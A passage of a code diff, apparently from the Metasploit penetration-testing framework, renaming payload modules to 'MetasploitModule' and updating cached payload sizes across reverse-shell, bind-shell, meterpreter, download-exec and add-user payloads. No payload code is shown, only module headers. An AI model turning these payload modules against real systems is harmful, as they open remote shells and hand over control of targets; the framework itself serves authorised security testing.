@@ -8,7 +8,7 @@ require 'msf/core/handler/find_port'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 61
diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
index 448d9fcd01..d8a4057d56 100644
--- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 65
diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb
index d40d2cdaf7..c85f1efd8e 100644
--- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 152
diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb
index 3803a6ce9c..403ee15239 100644
--- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 131
diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb
index a40a20d88e..f7009ff787 100644
--- a/modules/payloads/singles/php/bind_perl.rb
+++ b/modules/payloads/singles/php/bind_perl.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 230
diff --git a/modules/payloads/singles/php/bind_perl_ipv6.rb b/modules/payloads/singles/php/bind_perl_ipv6.rb
index f16b2c7b48..63402cbd52 100644
--- a/modules/payloads/singles/php/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/php/bind_perl_ipv6.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 230
diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb
index 0ffbedb343..f6a35f64cb 100644
--- a/modules/payloads/singles/php/bind_php.rb
+++ b/modules/payloads/singles/php/bind_php.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = :dynamic
diff --git a/modules/payloads/singles/php/bind_php_ipv6.rb b/modules/payloads/singles/php/bind_php_ipv6.rb
index 130f4320d1..5507578205 100644
--- a/modules/payloads/singles/php/bind_php_ipv6.rb
+++ b/modules/payloads/singles/php/bind_php_ipv6.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = :dynamic
diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb
index 7fa71530b1..c0f5941236 100644
--- a/modules/payloads/singles/php/download_exec.rb
+++ b/modules/payloads/singles/php/download_exec.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/payload/php'
-module Metasploit3
+module MetasploitModule
 CachedSize = :dynamic
diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb
index 3fce154d8c..09b07f6530 100644
--- a/modules/payloads/singles/php/exec.rb
+++ b/modules/payloads/singles/php/exec.rb
@@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
-module Metasploit3
+module MetasploitModule
 CachedSize = :dynamic
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index fff36fc4d5..2231bdda47 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -10,9 +10,9 @@ require 'msf/base/sessions/meterpreter_php'
 require 'msf/base/sessions/meterpreter_options'
-module Metasploit4
+module MetasploitModule
- CachedSize = 26205
+ CachedSize = 26778
 include Msf::Payload::Single
 include Msf::Payload::Php::ReverseTcp
diff --git a/modules/payloads/singles/php/reverse_perl.rb b/modules/payloads/singles/php/reverse_perl.rb
index 0cd13b8e44..194c5b90fa 100644
--- a/modules/payloads/singles/php/reverse_perl.rb
+++ b/modules/payloads/singles/php/reverse_perl.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = :dynamic
diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb
index 0e089fdab3..95b71cea29 100644
--- a/modules/payloads/singles/php/reverse_php.rb
+++ b/modules/payloads/singles/php/reverse_php.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = :dynamic
diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb
index fa366b6bb7..1595e817e7 100644
--- a/modules/payloads/singles/php/shell_findsock.rb
+++ b/modules/payloads/singles/php/shell_findsock.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 require 'msf/core/handler/find_shell'
-module Metasploit3
+module MetasploitModule
 CachedSize = :dynamic
diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
index 395962145f..db95d43a5e 100644
--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -10,9 +10,9 @@ require 'msf/core/payload/python/meterpreter_loader'
 require 'msf/core/payload/python/bind_tcp'
 require 'msf/base/sessions/meterpreter_python'
-module Metasploit4
+module MetasploitModule
- CachedSize = 50226
+ CachedSize = 51630
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index 44369a42a9..0e6c39e5de 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -10,9 +10,9 @@ require 'msf/core/payload/python/meterpreter_loader'
 require 'msf/core/payload/python/reverse_http'
 require 'msf/base/sessions/meterpreter_python'
-module Metasploit4
+module MetasploitModule
- CachedSize = 50190
+ CachedSize = 51590
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb
index efdecac0bc..4ce34b05c2 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -10,9 +10,9 @@ require 'msf/core/payload/python/meterpreter_loader'
 require 'msf/core/payload/python/reverse_http'
 require 'msf/base/sessions/meterpreter_python'
-module Metasploit4
+module MetasploitModule
- CachedSize = 50190
+ CachedSize = 51594
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
index 7988da15eb..fbce238351 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -10,9 +10,9 @@ require 'msf/core/payload/python/meterpreter_loader'
 require 'msf/core/payload/python/reverse_tcp'
 require 'msf/base/sessions/meterpreter_python'
-module Metasploit4
+module MetasploitModule
- CachedSize = 50146
+ CachedSize = 51546
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb
index 2a7ceb923f..372ce0e4fd 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 401
diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
index c3e6eb0765..ca80b41475 100644
--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 557
diff --git a/modules/payloads/singles/ruby/shell_bind_tcp.rb b/modules/payloads/singles/ruby/shell_bind_tcp.rb
index 943a4fe242..b8554cbe4f 100644
--- a/modules/payloads/singles/ruby/shell_bind_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_bind_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 516
diff --git a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
index 071ae85179..f084531e39 100644
--- a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
+++ b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 524
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
index 72db7766bd..cf4cb17543 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 516
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
index 0f16cba516..b2c7bef693 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 444
diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
index 1605bdd0ae..ed921903ab 100644
--- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 180
diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
index 6027131f48..050d136438 100644
--- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/find_port'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 136
diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
index 6957558e47..6d29055d6f 100644
--- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 144
diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb
index f90d730769..d8360af809 100644
--- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 95
diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb
index 63f6835cfc..c06c224c1e 100644
--- a/modules/payloads/singles/solaris/x86/shell_find_port.rb
+++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/find_port'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 86
diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
index 8263e301da..14b2b37855 100644
--- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 91
diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb
index 71ef428f1d..af1d155348 100644
--- a/modules/payloads/singles/tty/unix/interact.rb
+++ b/modules/payloads/singles/tty/unix/interact.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/find_tty'
 require 'msf/base/sessions/command_shell'
-module Metasploit3
+module MetasploitModule
 CachedSize = 0
diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb
index ce3d1fd43c..3c20929862 100644
--- a/modules/payloads/singles/windows/adduser.rb
+++ b/modules/payloads/singles/windows/adduser.rb
@@ -13,7 +13,7 @@ require 'msf/core/payload/windows/exec'
 # Extends the Exec payload to add a new user.
 #
 ###
-module Metasploit3
+module MetasploitModule
 CachedSize = 282
diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb
index dcb1415381..943fbec81f 100644
--- a/modules/payloads/singles/windows/dns_txt_query_exec.rb
+++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 285
diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb
index 3ecde4535b..1354a8d750 100644
--- a/modules/payloads/singles/windows/download_exec.rb
+++ b/modules/payloads/singles/windows/download_exec.rb
@@ -6,7 +6,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 423
diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb
index 436c0c3dfe..4df00b2d8f 100644
--- a/modules/payloads/singles/windows/exec.rb
+++ b/modules/payloads/singles/windows/exec.rb
@@ -11,7 +11,7 @@ require 'msf/core/payload/windows/exec'
 # Executes a command on the target machine
 #
 ###
-module Metasploit3
+module MetasploitModule
 CachedSize = 192
diff --git a/modules/payloads/singles/windows/format_all_drives.rb b/modules/payloads/singles/windows/format_all_drives.rb
index b9b0d580d4..e8a446f189 100644
--- a/modules/payloads/singles/windows/format_all_drives.rb
+++ b/modules/payloads/singles/windows/format_all_drives.rb
@@ -14,7 +14,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 393
diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb
index e0072623c0..8fe7335668 100644
--- a/modules/payloads/singles/windows/loadlibrary.rb
+++ b/modules/payloads/singles/windows/loadlibrary.rb
@@ -11,7 +11,7 @@ require 'msf/core/payload/windows/loadlibrary'
 # Executes a command on the target machine
 #
 ###
-module Metasploit3
+module MetasploitModule
 CachedSize = 230
diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb
index 291d792b63..88ee9f8ccf 100644
--- a/modules/payloads/singles/windows/messagebox.rb
+++ b/modules/payloads/singles/windows/messagebox.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 272
diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index 35cca34308..4aba839b4d 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/payloads/meterpreter/config'
-module Metasploit4
+module MetasploitModule
- CachedSize = 957487
+ CachedSize = 957999
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index cf8c6f0fd1..9b1ac80418 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/payloads/meterpreter/config'
-module Metasploit4
+module MetasploitModule
- CachedSize = 958531
+ CachedSize = 959043
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 32fe451235..91b073a44b 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/payloads/meterpreter/config'
-module Metasploit4
+module MetasploitModule
- CachedSize = 958531
+ CachedSize = 959043
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index 831e479db2..8cdbd91f25 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/payloads/meterpreter/config'
-module Metasploit4
+module MetasploitModule
- CachedSize = 957487
+ CachedSize = 957999
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index f84eac31bd..e2c6f3a72b 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/payloads/meterpreter/config'
-module Metasploit3
+module MetasploitModule
- CachedSize = 957487
+ CachedSize = 957999
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/metsvc_bind_tcp.rb b/modules/payloads/singles/windows/metsvc_bind_tcp.rb
index 69ffe8e323..c38bd1693c 100644
--- a/modules/payloads/singles/windows/metsvc_bind_tcp.rb
+++ b/modules/payloads/singles/windows/metsvc_bind_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 0
diff --git a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb
index 0fd1c8a955..898c4c71ab 100644
--- a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 0
diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb
index 95ef7b26c2..2d1e407e83 100644
--- a/modules/payloads/singles/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp'
 # Extends the Exec payload to add a new user.
 #
 ###
-module Metasploit3
+module MetasploitModule
 CachedSize = 1703
diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
index 487c0d8d35..b822413140 100644
--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 # Extends the Exec payload to add a new user.
 #
 ###
-module Metasploit3
+module MetasploitModule
 CachedSize = 1711
diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb
index d3059320ea..fc8d6d0f72 100644
--- a/modules/payloads/singles/windows/shell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/shell_bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 328
diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb
index 54ba7077c8..584368c19f 100644
--- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb
+++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 529
diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
index ac19a35a63..0416b159d4 100644
--- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
+++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 386
diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb
index dd4c6d1167..4ca47a3d69 100644
--- a/modules/payloads/singles/windows/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 324
diff --git a/modules/payloads/singles/windows/speak_pwned.rb b/modules/payloads/singles/windows/speak_pwned.rb
index 579e6863a1..c9f0e8ad52 100644
--- a/modules/payloads/singles/windows/speak_pwned.rb
+++ b/modules/payloads/singles/windows/speak_pwned.rb
@@ -38,7 +38,7 @@ require 'msf/core'
 require 'msf/core/payload/windows/exec'
-module Metasploit3
+module MetasploitModule
 CachedSize = 247
diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb
index 92455a5b9b..af38b18781 100644
--- a/modules/payloads/singles/windows/x64/exec.rb
+++ b/modules/payloads/singles/windows/x64/exec.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 275
diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb
index 8a8141c20b..d0ec05ceed 100644
--- a/modules/payloads/singles/windows/x64/loadlibrary.rb
+++ b/modules/payloads/singles/windows/x64/loadlibrary.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 313
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index 100760fd6d..493bfbf557 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/payloads/meterpreter/config'
-module Metasploit4
+module MetasploitModule
- CachedSize = 1188911
+ CachedSize = 1189423
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index 7d493b49e9..ee87c288fe 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 951dad4425..43d0262094 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index 519e5ed6d3..1ffc004cee 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 7ed67c7a06..01b46f82fc 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb 
